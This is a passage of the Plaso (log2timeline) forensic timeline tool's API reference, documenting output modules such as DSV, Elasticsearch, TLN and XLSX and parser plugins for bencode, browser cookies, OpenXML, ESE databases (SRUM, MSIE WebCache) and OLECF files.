Null device output module. class plaso.output.null.NullOutputModule(output_mediator) Bases: plaso.output.interface.OutputModule Null device output module. DESCRIPTION = 'Output module that does not output anything.' NAME = 'null' WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag.

5.1. Subpackages 205 Plaso (log2timeline), Release 20210606 plaso.output.rawpy module

Output module for the native (or “raw”) Python format. class plaso.output.rawpy.NativePythonEventFormattingHelper(output_mediator) Bases: plaso.output.formatting_helper.EventFormattingHelper Native (or “raw”) Python output module event formatting helper. GetFormattedEvent(event, event_data, event_data_stream, event_tag) Retrieves a string representation of the event. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns string representation of the event. Return type str class plaso.output.rawpy.NativePythonOutputModule(output_mediator) Bases: plaso.output.interface.TextFileOutputModule Output module for native (or “raw”) Python output format. DESCRIPTION = 'native (or "raw") Python output.' NAME = 'rawpy' plaso.output.shared_dsv module

Shared functionality for delimiter separated values output modules. class plaso.output.shared_dsv.DSVEventFormattingHelper(output_mediator, field_formatting_helper, field_names, field_delimiter=',') Bases: plaso.output.formatting_helper.EventFormattingHelper Delimiter separated values output module event formatting helper. GetFormattedEvent(event, event_data, event_data_stream, event_tag) Retrieves a string representation of the event. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns string representation of the event. Return type str GetFormattedFieldNames() Retrieves a string representation of the field names. Returns string representation of the field names.

206 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type str SetFieldDelimiter(field_delimiter) Sets the field delimiter. Parameters field_delimiter (str) – field delimiter. SetFields(field_names) Sets the names of the fields to output. Parameters field_names (list[str]) – names of the fields to output. class plaso.output.shared_dsv.DSVOutputModule(output_mediator, field_formatting_helper, names, delimiter=',', header=None) Bases: plaso.output.interface.TextFileOutputModule Shared functionality for delimiter separated values output modules. SetFieldDelimiter(field_delimiter) Sets the field delimiter. Parameters field_delimiter (str) – field delimiter. SetFields(field_names) Sets the names of the fields to output. Parameters field_names (list[str]) – names of the fields to output. WriteHeader() Writes the header to the output.

plaso.output.shared_elastic module

Shared functionality for Elasticsearch output modules. class plaso.output.shared_elastic.SharedElasticsearchFieldFormattingHelper(output_mediator) Bases: plaso.output.formatting_helper.FieldFormattingHelper Shared Elasticsearch output module field formatting helper. GetFormattedField(field_name, event, event_data, event_data_stream, event_tag) Formats the specified field. Parameters • field_name (str) – name of the field. • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns value of the field or None if not set. Return type object class plaso.output.shared_elastic.SharedElasticsearchOutputModule(output_mediator) Bases: plaso.output.interface.OutputModule Shared functionality for an Elasticsearch output module.

5.1. Subpackages 207 Plaso (log2timeline), Release 20210606

Close() Closes connection to Elasticsearch. Inserts any remaining buffered event documents. NAME = 'elastic_shared' SetCACertificatesPath(ca_certificates_path) Sets the path to the CA certificates. Parameters ca_certificates_path (str) – path to file containing a list of root certificates to trust. Raises BadConfigOption – if the CA certificates file does not exist. SetFields(field_names) Sets the names of the fields to output. Parameters field_names (list[str]) – names of the fields to output. SetFlushInterval(flush_interval) Sets the flush interval. Parameters flush_interval (int) – number of events to buffer before doing a bulk insert. SetIndexName(index_name) Sets the index name. Parameters index_name (str) – name of the index. SetMappings(mappings) Sets the mappings. Parameters mappings (dict[str, object]) – mappings of the index. SetPassword(password) Sets the password. Parameters password (str) – password to authenticate with. SetServerInformation(server, port) Sets the server information. Parameters • server (str) – IP address or hostname of the server. • port (int) – Port number of the server. SetURLPrefix(url_prefix) Sets the URL prefix. Parameters url_prefix (str) – URL prefix. SetUseSSL(use_ssl) Sets the use of ssl. Parameters use_ssl (bool) – enforces use of ssl. SetUsername(username) Sets the username. Parameters username (str) – username to authenticate with. WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output.

208 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag.

plaso.output.shared_json module

Shared functionality for JSON based output modules. class plaso.output.shared_json.JSONEventFormattingHelper(output_mediator) Bases: plaso.output.formatting_helper.EventFormattingHelper JSON output module event formatting helper. GetFormattedEvent(event, event_data, event_data_stream, event_tag) Retrieves a string representation of the event. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag. Returns string representation of the event. Return type str plaso.output.tln module

Output module for the TLN format. For documentation on the TLN format see: https://forensicswiki.xyz/wiki/index.php?title=TLN class plaso.output.tln.L2TTLNOutputModule(output_mediator) Bases: plaso.output.shared_dsv.DSVOutputModule Output module for the log2timeline extended variant of the TLN format. l2tTLN is an extended variant of TLN introduced log2timeline.pl 0.65. l2tTLN extends basic TLN to 7 | separated fields, namely: * Time - 32-bit POSIX (or Unix) epoch timestamp. * Source - The name of the parser or plugin that produced the event. * Host - The source host system. * User - The user associated with the data. * Description - Message string describing the data. * TZ - L2T 0.65 field. Timezone of the event. * Notes - L2T 0.65 field. Optional notes field or filename and inode. DESCRIPTION = 'Extended TLN 7 field | delimited output.' NAME = 'l2ttln' class plaso.output.tln.TLNFieldFormattingHelper(output_mediator) Bases: plaso.output.formatting_helper.FieldFormattingHelper TLN output module field formatting helper.

5.1. Subpackages 209 Plaso (log2timeline), Release 20210606 class plaso.output.tln.TLNOutputModule(output_mediator) Bases: plaso.output.shared_dsv.DSVOutputModule Output module for the TLN format. TLN defines 5 | separated fields, namely: * Time - 32-bit POSIX (or Unix) epoch timestamp. * Source -Thename of the parser or plugin that produced the event. * Host - The source host system. * User - The user associated with the data. * Description - Message string describing the data. DESCRIPTION = 'TLN 5 field | delimited output.' NAME = 'tln' plaso.output.xlsx module

Output module for the Excel Spreadsheet (XLSX) output format. class plaso.output.xlsx.XLSXOutputModule(output_mediator) Bases: plaso.output.interface.OutputModule Output module for the Excel Spreadsheet (XLSX) output format. Close() Closes the workbook. DESCRIPTION = 'Excel Spreadsheet (XLSX) output' NAME = 'xlsx' Open(path=None, **kwargs) Creates a new workbook. Parameters path (Optional[str]) – path of the output file. Raises • IOError – if the specified output file already exists. • OSError – if the specified output file already exists. • ValueError – if path is not set. SetFields(fields) Sets the fields to output. Parameters fields (list[str]) – names of the fields to output. SetTimestampFormat(timestamp_format) Set the timestamp format to use for the datetime column. Parameters timestamp_format (str) – format string of date and time values. WRITES_OUTPUT_FILE = True WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output. Parameters • event (EventObject) – event. • event_data (EventData) – event data. • event_data_stream (EventDataStream) – event data stream. • event_tag (EventTag) – event tag.

210 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

WriteHeader() Writes the header to the spreadsheet.

Module contents

This file imports Python modules that register output modules.

5.1.11 plaso.parsers package

Subpackages plaso.parsers.bencode_plugins package

Submodules plaso.parsers.bencode_plugins.interface module

Bencode parser plugin interface. class plaso.parsers.bencode_plugins.interface.BencodePlugin Bases: plaso.parsers.plugins.BasePlugin Bencode parser plugin interface. CheckRequiredKeys(bencode_file) Checks if the bencode file has the minimal keys required by the plugin. Parameters bencode_file (BencodeFile) – bencode file. Returns True if the bencode file has the minimum keys defined by the plugin, or False if it does not or no required keys are defined. The bencode file can have more keys than specified by the plugin and still return True. Return type bool DATA_FORMAT = 'Bencoded file' NAME = 'bencode_plugin' abstract Process(parser_mediator, bencode_file=None, **kwargs) Extracts events from a bencode file. This is the main method that a Bencode plugin needs to implement. The contents of the bencode keys defined in _BENCODE_KEYS can be made available to the plugin as both a matched{‘KEY’: ‘value’} and as the entire bencoded data dictionary. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • bencode_file (Optional[BencodeFile]) – bencode file.

5.1. Subpackages 211 Plaso (log2timeline), Release 20210606

plaso.parsers.bencode_plugins.transmission module

Bencode parser plugin for Transmission BitTorrent files. class plaso.parsers.bencode_plugins.transmission.TransmissionBencodePlugin Bases: plaso.parsers.bencode_plugins.interface.BencodePlugin Parse Transmission BitTorrent activity file for current torrents. Transmission stores an individual Bencoded file for each active download in a folder named resume underthe user’s application data folder. DATA_FORMAT = 'Transmission BitTorrent activity file' NAME = 'bencode_transmission' Process(parser_mediator, bencode_file=None, **kwargs) Extracts events from a Transmission’s resume folder file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • bencode_file (Optional[BencodeFile]) – bencode file. class plaso.parsers.bencode_plugins.transmission.TransmissionEventData Bases: plaso.containers.events.EventData Transmission BitTorrent event data. destination path of the downloaded file. Type str seedtime client seed time in number of minutes. Type int DATA_TYPE = 'p2p:bittorrent:transmission' plaso.parsers.bencode_plugins.utorrent module

Bencode parser plugin for uTorrent active torrent files. class plaso.parsers.bencode_plugins.utorrent.UTorrentBencodePlugin Bases: plaso.parsers.bencode_plugins.interface.BencodePlugin Plugin to extract parse uTorrent active torrent files. uTorrent creates a file, resume.dat, and a backup, resume.dat.old, to for all active torrents. This is typically stored in the user’s application data folder. These files, at a minimum, contain a ‘.fileguard’ key and a dictionary with a key name for a particular download with a ‘.torrent’ file extension. DATA_FORMAT = 'uTorrent active torrent file' NAME = 'bencode_utorrent' Process(parser_mediator, bencode_file=None, **kwargs) Extracts events from an uTorrent active torrent file.

212 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • bencode_file (Optional[BencodeFile]) – bencode file. class plaso.parsers.bencode_plugins.utorrent.UTorrentEventData Bases: plaso.containers.events.EventData uTorrent active torrent event data. caption official name of package. Type str destination path of the downloaded file. Type str seedtime client seed time in number of minutes. Type int DATA_TYPE = 'p2p:bittorrent:utorrent'

Module contents

Imports for the bencode parser. plaso.parsers.cookie_plugins package

Submodules plaso.parsers.cookie_plugins.ganalytics module

This file contains a plugin for parsing Google Analytics cookies. class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData(cookie_identifier) Bases: plaso.containers.events.EventData Google Analytics event data. cookie_name name of cookie. Type str domain_hash domain hash. Type str pages_viewed number of pages viewed. Type int

5.1. Subpackages 213 Plaso (log2timeline), Release 20210606

sessions number of sessions. Type int sources number of sources. Type int url URL or path where the cookie got set. Type str visitor_id visitor identifier. Type str DATA_TYPE = 'cookie:google:analytics' class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmaPlugin Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin A browser cookie plugin for __utma Google Analytics cookies. The structure of the cookie data: ..... For example: 137167072.1215918423.1383170166.1383170166.1383170166.1 Or: For example: 13113225820000000 COOKIE_NAME = '__utma' DATA_FORMAT = 'Google Analytics __utma cookie' NAME = 'google_analytics_utma' class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmbPlugin Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin A browser cookie plugin for __utmb Google Analytics cookies. The structure of the cookie data: ... For example: 137167072.1.10.1383170166 173272373.6.8.1440489514899 173272373.4.9.1373300660574 Or: For example: 13113225820000000 COOKIE_NAME = '__utmb' DATA_FORMAT = 'Google Analytics __utmb cookie' NAME = 'google_analytics_utmb' class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmtPlugin Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin A browser cookie plugin for __utmt Google Analytics cookies. The structure of the cookie data: For example: 13113215173000000

214 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

COOKIE_NAME = '__utmt' DATA_FORMAT = 'Google Analytics __utmt cookie' NAME = 'google_analytics_utmt' class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmzPlugin Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin A browser cookie plugin for __utmz Google Analytics cookies. The structure of the cookie data: .... For example: 207318870.1383170190.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic| utmctr=(not%20provided) Or: For example: 13128990382000000 COOKIE_NAME = '__utmz' DATA_FORMAT = 'Google Analytics __utmz cookie' NAME = 'google_analytics_utmz' plaso.parsers.cookie_plugins.interface module

This file contains an interface for browser cookie plugins. class plaso.parsers.cookie_plugins.interface.BaseCookiePlugin Bases: plaso.parsers.plugins.BasePlugin A browser cookie plugin for Plaso. This is a generic cookie parsing interface that can handle parsing cookies from all browsers. COOKIE_NAME = '' DATA_FORMAT = 'Browser cookie data' NAME = 'cookie_plugin' Process(parser_mediator, cookie_name, cookie_data, url, **kwargs) Extracts events from cookie data. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cookie_name (str) – the name of the cookie value. • cookie_data (bytes) – the cookie data, as a byte sequence. • url (str) – the full URL or path where the cookie was set. Raises • errors.WrongPlugin – If the cookie name differs from the one supplied in COOKIE_NAME. • ValueError – If cookie_name or cookie_data are not set.

5.1. Subpackages 215 Plaso (log2timeline), Release 20210606

plaso.parsers.cookie_plugins.manager module

The cookie plugins manager object. class plaso.parsers.cookie_plugins.manager.CookiePluginsManager Bases: object Class that implements the cookie plugins manager. classmethod DeregisterPlugin(plugin_class) Deregisters a plugin class. The plugin classes are identified based on their lower case name. Parameters plugin_class (type) – the class object of the plugin. Raises KeyError – if plugin class is not set for the corresponding name. classmethod GetPlugins() Retrieves the cookie plugins. Returns list of all cookie plugin objects. Return type list[type] classmethod RegisterPlugin(plugin_class) Registers a plugin class. The plugin classes are identified based on their lower case name. Parameters plugin_class (type) – the class object of the plugin. Raises KeyError – if plugin class is already set for the corresponding name. classmethod RegisterPlugins(plugin_classes) Registers plugin classes. The plugin classes are identified based on their lower case name. Parameters plugin_classes (list[type]) – a list of class objects of the plugins. Raises KeyError – if plugin class is already set for the corresponding name.

Module contents

Imports for the cookies parser. plaso.parsers.czip_plugins package

Submodules plaso.parsers.czip_plugins.interface module

Interface for compound ZIP file plugins. class plaso.parsers.czip_plugins.interface.CompoundZIPPlugin Bases: plaso.parsers.plugins.BasePlugin Compound ZIP parser plugin.

216 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

CheckRequiredPaths(zip_file) Checks if the ZIP file has the minimal structure required by the plugin. Parameters zip_file (zipfile.ZipFile) – the ZIP file. It should not be closed in this method, but will be closed by the parser logic in czip.py. Returns True if the ZIP file has the minimum paths defined by the plugin, or False if it does not or no required paths are defined. The ZIP file can have more paths than specified bythe plugin and still return True. Return type bool DATA_FORMAT = 'Compound ZIP file' NAME = 'czip_plugin' Process(parser_mediator, zip_file=None, **kwargs) Extracts events from the ZIP file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • zip_file (Optional[zipfile.ZipFile]) – the ZIP file. It should not be closed in this method, but will be closed by the parser logic in czip.py. Raises ValueError – If the ZIP file argument is not valid. REQUIRED_PATHS = frozenset({}) plaso.parsers.czip_plugins.oxml module

Compound ZIP parser plugin for OpenXML files. class plaso.parsers.czip_plugins.oxml.OpenXMLEventData Bases: plaso.containers.events.EventData OXML event data. app_version version of application that created document. Type str author name of author. Type str creating_app name of application that created document. Type str doc_security ??? Type str hyperlinks_changed True if hyperlinks have changed.

5.1. Subpackages 217 Plaso (log2timeline), Release 20210606

Type bool i4 ??? Type str last_saved_by name of user that last saved the document. Type str links_up_to_date True if the links are up to date. Type bool number_of_characters number of characters without spaces in the document. Type int number_of_characters_with_spaces number of characters including spaces in the document. Type int number_of_lines number of lines in the document. Type int number_of_pages number of pages in the document. Type int number_of_paragraphs number of paragraphs in the document. Type int number_of_words number of words in the document. Type int revision_number revision number. Type int scale_crop True if crop to scale is enabled. Type bool shared_doc True if document is shared. Type bool template name of template ??? Type str

218 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

total_time ??? Type str DATA_TYPE = 'metadata:openxml' class plaso.parsers.czip_plugins.oxml.OpenXMLPlugin Bases: plaso.parsers.czip_plugins.interface.CompoundZIPPlugin Parse metadata from OXML files. DATA_FORMAT = 'OpenXML (OXML) file' NAME = 'oxml' REQUIRED_PATHS = frozenset({'[Content_Types].xml', '_rels/.rels', 'docProps/core.xml'})

Module contents

Imports for the compound ZIP parser. plaso.parsers.esedb_plugins package

Submodules plaso.parsers.esedb_plugins.file_history module

Parser for the Microsoft File History ESE database. class plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPlugin Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin Parses a File History ESE database file. DATA_FORMAT = 'Windows 8 File History ESE database file' NAME = 'file_history' ParseNameSpace(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the namespace table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cache (Optional[ESEDBCache]) – cache. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. Raises ValueError – if the database or table value is missing. REQUIRED_TABLES = {'backupset': '', 'file': '', 'library': '', 'namespace': 'ParseNameSpace'}

5.1. Subpackages 219 Plaso (log2timeline), Release 20210606

class plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventData Bases: plaso.containers.events.EventData File history namespace table event data. file_attribute file attribute. Type int identifier identifier. Type str original_filename original file name. Type str parent_identifier parent identifier. Type str usn_number USN number. Type int DATA_TYPE = 'file_history:namespace:event' plaso.parsers.esedb_plugins.interface module

This file contains the interface for ESE database plugins. class plaso.parsers.esedb_plugins.interface.ESEDBPlugin Bases: plaso.parsers.plugins.BasePlugin, plaso.lib.dtfabric_helper.DtFabricHelper The ESE database plugin interface. BINARY_DATA_COLUMN_TYPES = frozenset({pyesedb.column_types.LARGE_BINARY_DATA, pyesedb.column_types.BINARY_DATA})

CheckRequiredTables(database) Check if the database has the minimal structure required by the plugin. Parameters database (ESEDatabase) – ESE database to check. Returns True if the database has the minimum tables defined by the plugin, or False if it does not or no required tables are defined. The database can have more tables than specified by the plugin and still return True. Return type bool DATA_FORMAT = 'ESE database file' FLOATING_POINT_COLUMN_TYPES = frozenset({pyesedb.column_types.DOUBLE_64BIT, pyesedb.column_types.FLOAT_32BIT})

220 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

INTEGER_COLUMN_TYPES = frozenset({pyesedb.column_types.INTEGER_32BIT_UNSIGNED, pyesedb.column_types.DATE_TIME, pyesedb.column_types.INTEGER_16BIT_UNSIGNED, pyesedb.column_types.INTEGER_64BIT_SIGNED, pyesedb.column_types.INTEGER_8BIT_UNSIGNED, pyesedb.column_types.INTEGER_32BIT_SIGNED, pyesedb.column_types.CURRENCY, pyesedb.column_types.INTEGER_16BIT_SIGNED}) NAME = 'esedb_plugin' OPTIONAL_TABLES = {} Process(parser_mediator, cache=None, database=None, **kwargs) Extracts events from an ESE database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • cache (Optional[ESEDBCache]) – cache. • database (Optional[ESEDatabase]) – ESE database. Raises ValueError – If the database argument is not valid. REQUIRED_TABLES = {} STRING_COLUMN_TYPES = frozenset({pyesedb.column_types.TEXT, pyesedb.column_types.LARGE_TEXT}) plaso.parsers.esedb_plugins.msie_webcache module

Parser for the Microsoft Internet Explorer WebCache ESE database. The WebCache database (WebCacheV01.dat or WebCacheV24.dat) are used by MSIE as of version 10. class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData Bases: plaso.containers.events.EventData MSIE WebCache Container table event data. access_count access count. Type int cached_filename name of the cached file. Type str cached_file_size size of the cached file. Type int cache_identifier cache identifier. Type int container_identifier container identifier.

5.1. Subpackages 221 Plaso (log2timeline), Release 20210606

Type int entry_identifier entry identifier. Type int file_extension file extension. Type str redirect_url URL from which the request was redirected. Type str request_headers request headers. Type str response_headers response headers. Type str sync_count sync count. Type int url URL. Type str DATA_TYPE = 'msie:webcache:container' class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventData Bases: plaso.containers.events.EventData MSIE WebCache Containers table event data. container_identifier container identifier. Type int directory name of the cache directory. Type str name name of the cache container. Type str set_identifier set identifier. Type int DATA_TYPE = 'msie:webcache:containers'

222 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPlugin Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin Parses a MSIE WebCache ESE database file. DATA_FORMAT = 'Internet Explorer WebCache ESE database (WebCacheV01.dat, WebCacheV24.dat) file' NAME = 'msie_webcache' OPTIONAL_TABLES = {'Partitions': 'ParsePartitionsTable', 'PartitionsEx': 'ParsePartitionsTable'} ParseContainersTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a Containers table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. Raises ValueError – if the database or table value is missing. ParseLeakFilesTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a LeakFiles table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. Raises ValueError – if the database or table value is missing. ParsePartitionsTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a Partitions or PartitionsEx table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. Raises ValueError – if the database or table value is missing. REQUIRED_TABLES = {'Containers': 'ParseContainersTable', 'LeakFiles': 'ParseLeakFilesTable'} class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventData Bases: plaso.containers.events.EventData MSIE WebCache LeakFiles event data. cached_filename name of the cached file. Type str

5.1. Subpackages 223 Plaso (log2timeline), Release 20210606

leak_identifier leak identifier. Type int DATA_TYPE = 'msie:webcache:leak_file' class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventData Bases: plaso.containers.events.EventData MSIE WebCache Partitions table event data. directory directory. Type str partition_identifier partition identifier. Type int partition_type partition type. Type int table_identifier table identifier. Type int DATA_TYPE = 'msie:webcache:partitions' plaso.parsers.esedb_plugins.srum module

Parser for the System Resource Usage Monitor (SRUM) ESE database. For more information about the database format see: https://github.com/libyal/esedb-kb/blob/main/documentation/ System%20Resource%20Usage%20Monitor%20(SRUM).asciidoc class plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData Bases: plaso.containers.events.EventData SRUM application resource usage event data. Note that the interpretation of some of these values is undocumented as far as currently known. application application. Type str background_bytes_read background number of bytes read. Type int background_bytes_written background number of bytes written. Type int

224 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

background_context_switches number of background context switches. Type int background_cycle_time background cycle time. Type int background_number_for_flushes background number of flushes. Type int background_number_for_read_operations background number of read operations. Type int background_number_for_write_operations background number of write operations. Type int face_time face time. Type int foreground_bytes_read foreground number of bytes read. Type int foreground_bytes_written foreground number of bytes written. Type int foreground_context_switches number of foreground context switches. Type int foreground_cycle_time foreground cycle time. Type int foreground_number_for_flushes foreground number of flushes. Type int foreground_number_for_read_operations foreground number of read operations. Type int foreground_number_for_write_operations foreground number of write operations. Type int identifier record identifier.

5.1. Subpackages 225 Plaso (log2timeline), Release 20210606

Type int user_identifier user identifier, which is a Windows NT security identifier. Type str DATA_TYPE = 'windows:srum:application_usage' class plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventData Bases: plaso.containers.events.EventData SRUM network connectivity usage event data. Note that the interpretation of some of these values is undocumented as far as currently known. application application. Type str identifier record identifier. Type int interface_luid interface locally unique identifier (LUID). Type int l2_profile_flags L2 profile flags. Type int l2_profile_identifier L2 profile identifier. Type int user_identifier user identifier, which is a Windows NT security identifier. Type str DATA_TYPE = 'windows:srum:network_connectivity' class plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData Bases: plaso.containers.events.EventData SRUM network data usage event data. Note that the interpretation of some of these values is undocumented as far as currently known. application application. Type str bytes_received number of bytes received. Type int bytes_sent number of bytes sent.

226 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type int identifier record identifier. Type int interface_luid interface locally unique identifier (LUID). Type int l2_profile_flags L2 profile flags. Type int l2_profile_identifier L2 profile identifier. Type int user_identifier user identifier, which is a Windows NT security identifier. Type str DATA_TYPE = 'windows:srum:network_usage' class plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPlugin Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin Parses a System Resource Usage Monitor (SRUM) ESE database file. DATA_FORMAT = 'System Resource Usage Monitor (SRUM) ESE database file' NAME = 'srum' OPTIONAL_TABLES = {'{973F5D5C-1D90-4944-BE8E-24B94231A174}': 'ParseNetworkDataUsage', '{D10CA2FE-6FCF-4F6D-848E-B2E99266FA89}': 'ParseApplicationResourceUsage', '{DD6636C4-8929-4683-974E-22C046A43763}': 'ParseNetworkConnectivityUsage'} ParseApplicationResourceUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the application resource usage table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. ParseNetworkConnectivityUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the network connectivity usage monitor table. Parameters

5.1. Subpackages 227 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. ParseNetworkDataUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the network data usage monitor table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. REQUIRED_TABLES = {'SruDbIdMapTable': ''}

Module contents

Imports for the ESE database parser. plaso.parsers.olecf_plugins package

Submodules plaso.parsers.olecf_plugins.automatic_destinations module

Plugin to parse .automaticDestinations-ms OLECF files. class plaso.parsers.olecf_plugins.automatic_destinations. AutomaticDestinationsDestListEntryEventData Bases: plaso.containers.events.EventData .automaticDestinations-ms DestList entry event data. birth_droid_file_identifier birth droid file identifier. Type str birth_droid_volume_identifier birth droid volume identifier. Type str droid_file_identifier droid file identifier. Type str

228 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

droid_volume_identifier droid volume identifier. Type str entry_number DestList entry number. Type int path path. Type str pin_status pin status. Type int offset offset of the DestList entry relative to the start of the DestList stream, from which the eventdatawas extracted. Type int DATA_TYPE = 'olecf:dest_list:entry' class plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin, plaso.lib.dtfabric_helper. DtFabricHelper Plugin that parses an .automaticDestinations-ms OLECF file. DATA_FORMAT = 'Automatic destinations jump list OLE compound file (.automaticDestinations-ms)' NAME = 'olecf_automatic_destinations' ParseDestList(parser_mediator, olecf_item) Parses the DestList OLECF item. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • olecf_item (pyolecf.item) – OLECF item. Raises UnableToParseFile – if the DestList cannot be parsed. Process(parser_mediator, root_item=None, **kwargs) Extracts events from an OLECF file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root_item is not set. REQUIRED_ITEMS = frozenset({'DestList'})

5.1. Subpackages 229 Plaso (log2timeline), Release 20210606 plaso.parsers.olecf_plugins.default module

The default plugin for parsing OLE Compound Files (OLECF). class plaso.parsers.olecf_plugins.default.DefaultOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin Class to define the default OLECF file plugin. DATA_FORMAT = 'Generic OLE compound item' NAME = 'olecf_default' Process(parser_mediator, root_item=None, **kwargs) Extracts events from an OLECF file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root item is not set. class plaso.parsers.olecf_plugins.default.OLECFItemEventData Bases: plaso.containers.events.EventData OLECF item event data. name name of the OLE Compound File item. Type str size data size of the OLE Compound File item. Type int DATA_TYPE = 'olecf:item' plaso.parsers.olecf_plugins.interface module

This file contains the necessary interface for OLECF plugins. class plaso.parsers.olecf_plugins.interface.OLECFPlugin Bases: plaso.parsers.plugins.BasePlugin The OLECF parser plugin interface. DATA_FORMAT = 'OLE compound file' NAME = 'olecf_plugin' abstract Process(parser_mediator, root_item=None, **kwargs) Extracts events from an OLECF file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file.

230 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

REQUIRED_ITEMS = frozenset({}) plaso.parsers.olecf_plugins.summary module

